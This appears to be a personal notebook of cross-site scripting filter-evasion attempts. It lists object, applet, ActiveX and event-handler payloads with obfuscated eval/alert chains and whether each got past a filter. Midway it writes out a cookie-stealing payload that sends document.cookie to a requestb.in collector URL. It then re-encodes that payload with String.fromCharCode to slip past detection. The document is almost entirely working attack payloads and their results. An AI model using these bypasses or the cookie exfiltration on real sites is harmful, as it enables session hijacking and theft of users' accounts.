- <object><param value></param></object>
- <object><param value></param></object>
- this passes
- name="src" value=
- "javascript:alert(0)">
- <object><param name=src value=></param></object>
- ok, this passes
- <object><param name=src value=javascript></param></object>
- ok, this passes
- <object><param name=src value=javascript:alert(0)></param></object>
- no, this does not pass
- <object><param name=src value=javascript:></param></object>
- no, the : messes things up
- <object><param name=src value=a=eval;b=alert;a(b((String.fromCharCode(88,83,83)));></param></object>
- passes but is not interpreted
- <object><param name=onerror value=a=eval;b=alert;a(b(String.fromCharCode(88,83,83)));></param></object>
- passes but is not interpreted
- <html><title>{}</title></html>
- ok, this passes
- <html><title>{}</title></html>
- ok, this passes
- <html><title>{a=eval;b=alert;a(b(String.fromCharCode(88,83,83)));}</title></html>
- this passes but is not interpreted
- <html><title>{a=eval;b=alert;a(b('xss'));}</title></html>
- XSS detected
- <b "<
- passes
- <sCrIpt>alert(1)</ScRipt>
- Does not pass,
- <applet also passes
- <object codebase= >tata</object> ok
- continuing testing
- <object codebase=https://requestb.in/186lk5x1?admin >tata</object>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=></OBJECT>
- this passes
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=a=eval;b=alert;a(b(123));></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=a=eval;b=alert;a(b(String.fromCharCode(88,83,83)));></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=a=eval;b=alert;a(b(String.fromCharCode(88,83,83)));></OBJECT>
- this passes
- Code to inject:
- document.location('https://requestb.in/186lk5x1/?cookie='+document.cookie)
- it has to be converted to char codes
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=a=eval;a(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,40,39,104,116,116,112,115,58,47,47,114,101,113,117,101,115,116,98,46,105,110,47,49,56,54,108,107,53,120,49,47,63,99,111,111,107,105,101,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41););></OBJECT>
- this passes but gives no results
- <applet java_codebase=http://someurl java_object=xss.ser></applet>
- #$%&()*~+-_.,:;?@[/|\]^
- !`
- this seems to work
- t=eval;b=alert;t(b(String.fromCharCode(88,83,83)));
- <a onerror!=prompt('1') >aa</a>
- <a onerror!=t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a>
- <a onerror#=t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a>
- <a onerror`t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a> does not pass
- <a onerror%=t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a>
- <a onerror$=t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a>
- <a onmouseover />
- =t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a> nok
- <a onmouseover#=t=eval;b=alert;t(b(String.fromCharCode(88,83,83)));l>aa</a> is not interpreted
- <a onmouseover=t=eval;b=alert;t(b(String.fromCharCode(88,83,83)));l>aa</a> cela passe en sur
- <a onmouseover=t=eval;b=alert;t(b(String.fromCharCode(88,83,83)));l>aa</a> does not pass with $!